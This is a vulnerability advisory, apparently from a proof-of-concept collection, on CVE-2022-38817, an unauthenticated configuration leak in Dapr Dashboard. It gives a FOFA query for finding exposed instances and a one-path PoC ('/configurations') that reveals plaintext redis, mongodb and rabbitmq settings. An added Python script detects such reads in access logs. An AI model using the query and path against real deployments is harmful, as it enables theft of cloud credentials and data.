Awesome-POC/Web应用漏洞/Dapr Dashboard configurations 未授权访问漏洞 CVE-2022-38817.md
2022-10-17 17:17:13 +08:00


# Dapr Dashboard configurations unauthorized access vulnerability CVE-2022-38817
## Vulnerability description
Dapr Dashboard has an unauthorized access vulnerability: without any authentication, the plaintext configuration of cloud applications such as redis, mongodb and rabbitmq can be obtained, and that configuration can then be used to reach sensitive data in the cloud environment.
## Affected products
```
Dapr Dashboard
```
## FOFA
```
"Dapr Dashboard"
```
## Reproduction
Main page
![image-20221017171042042](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210171710081.png)
Verification PoC
```
/configurations
```
![image-20221017171055193](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210171710235.png)
![image-20221017171111046](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210171711095.png)
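As an added detection example (not part of the original PoC), the script below scans reverse-proxy access logs in front of a Dapr Dashboard and flags successful reads of the `/configurations` path from source addresses outside an internal allowlist. The allowlisted networks, the log lines and the `/configurations/statestore` sub-path are constructed for illustration.

```python
"""Flag successful /configurations reads on a Dapr Dashboard from untrusted sources."""
import ipaddress
import re

# Combined (nginx/Apache) access log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumption: networks that are allowed to reach the dashboard (constructed allowlist).
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]

# The dashboard path from the PoC that returns component configuration in plaintext.
SENSITIVE_PREFIX = "/configurations"


def parse_line(line):
    """Return the parsed fields of one access log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_trusted(ip):
    """True if ip falls inside one of the allowlisted networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_NETS)


def find_exposed_config_reads(lines):
    """Return (ip, path, status) for 2xx responses to /configurations* from untrusted IPs."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # ignore query string
        if not (path == SENSITIVE_PREFIX or path.startswith(SENSITIVE_PREFIX + "/")):
            continue
        if rec["status"].startswith("2") and not is_trusted(rec["ip"]):
            hits.append((rec["ip"], path, int(rec["status"])))
    return hits


# Constructed sample log lines: one internal read, two external reads, one unrelated page, one blocked read.
SAMPLE_LOG = [
    '10.0.3.4 - - [17/Oct/2022:17:10:42 +0800] "GET /configurations HTTP/1.1" 200 1342 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [17/Oct/2022:17:10:55 +0800] "GET /configurations HTTP/1.1" 200 1342 "-" "curl/7.85.0"',
    '203.0.113.7 - - [17/Oct/2022:17:11:11 +0800] "GET /configurations/statestore HTTP/1.1" 200 611 "-" "curl/7.85.0"',
    '198.51.100.9 - - [17/Oct/2022:17:11:20 +0800] "GET /overview HTTP/1.1" 200 980 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [17/Oct/2022:17:11:25 +0800] "GET /configurations HTTP/1.1" 403 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, status in find_exposed_config_reads(SAMPLE_LOG):
        print(f"ALERT untrusted read of {path} from {ip} (HTTP {status})")
```

Any hit means the dashboard is answering configuration requests to callers that never passed an authentication layer, which is the exposure described in this advisory.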